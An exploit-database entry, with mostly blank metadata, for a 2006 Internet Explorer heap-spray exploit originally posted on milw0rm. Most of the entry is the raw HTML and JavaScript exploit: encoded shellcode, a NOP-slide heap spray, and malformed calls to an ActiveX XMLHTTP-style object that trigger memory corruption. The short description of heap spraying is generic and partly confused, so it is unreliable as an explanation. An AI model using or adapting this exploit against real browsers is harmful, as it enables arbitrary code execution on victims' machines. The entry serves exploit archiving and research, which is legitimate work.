Heap Spray Exploit

vendor:

Unknown

by:

Unknown

7,5

CVSS

HIGH

Heap Spray Exploit

119

CWE

Product Name: Unknown

Affected Version From: Unknown

Affected Version To: Unknown

Patch Exists: Unknown

Related CWE: Unknown

CPE: Unknown

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: Unknown

Unknown

Heap Spray Exploit is a technique used by attackers to inject malicious code into a vulnerable application. The attacker uses a heap spray to spray a large number of objects onto the heap, which can then be used to execute arbitrary code. The attacker can then use the heap spray to overwrite the return address of a function, allowing them to execute arbitrary code.

Mitigation:

The best way to mitigate heap spray attacks is to ensure that all applications are up to date with the latest security patches and that all vulnerable applications are removed from the system.

Source

Exploit-DB raw data:

<html xmlns="http://www.w3.org/1999/xhtml">
<body>
<script>
	var heapSprayToAddress = 0x05050505;

	var payLoadCode = unescape("%uE8FC%u0044%u0000%u458B%u8B3C%u057C%u0178%u8BEF%u184F%u5F8B%u0120%u49EB%u348B%u018B%u31EE%u99C0%u84AC%u74C0%uC107%u0DCA%uC201%uF4EB%u543B%u0424%uE575%u5F8B%u0124%u66EB%u0C8B%u8B4B%u1C5F%uEB01%u1C8B%u018B%u89EB%u245C%uC304%uC031%u8B64%u3040%uC085%u0C78%u408B%u8B0C%u1C70%u8BAD%u0868%u09EB%u808B%u00B0%u0000%u688B%u5F3C%uF631%u5660%uF889%uC083%u507B%u7E68%uE2D8%u6873%uFE98%u0E8A%uFF57%u63E7%u6C61%u0063");
</script>
<script>
	var heapBlockSize = 0x400000;

	var payLoadSize = payLoadCode.length * 2;

	var spraySlideSize = heapBlockSize - (payLoadSize+0x38);

	var spraySlide = unescape("%u9090%u9090");
	spraySlide = getSpraySlide(spraySlide,spraySlideSize);

	heapBlocks = (heapSprayToAddress - 0x400000)/heapBlockSize;

	memory = new Array();

	for (i=0;i<heapBlocks;i++)
	{
		memory[i] = spraySlide + payLoadCode;
	}



	function getSpraySlide(spraySlide, spraySlideSize)
	{
		while (spraySlide.length*2<spraySlideSize)
		{
			spraySlide += spraySlide;
		}
		spraySlide = spraySlide.substring(0,spraySlideSize/2);
		return spraySlide;
	}

</script>
<object id=target classid="CLSID:88d969c5-f192-11d4-a65f-0040963251e5" >
</object>
<script>
var obj = null;

obj = document.getElementById('target').object;

try {
obj.open(new Array(),new Array(),new Array(),new Array(),new Array());
} catch(e) {};

obj.open(new Object(),new Object(),new Object(),new Object(), new Object());    

obj.setRequestHeader(new Object(),'......');
obj.setRequestHeader(new Object(),0x12345678);
obj.setRequestHeader(new Object(),0x12345678);
obj.setRequestHeader(new Object(),0x12345678);
obj.setRequestHeader(new Object(),0x12345678);
obj.setRequestHeader(new Object(),0x12345678);
obj.setRequestHeader(new Object(),0x12345678);
obj.setRequestHeader(new Object(),0x12345678);
obj.setRequestHeader(new Object(),0x12345678);
obj.setRequestHeader(new Object(),0x12345678);
obj.setRequestHeader(new Object(),0x12345678);
obj.setRequestHeader(new Object(),0x12345678);

</script>


</body></html>

# milw0rm.com [2006-11-10]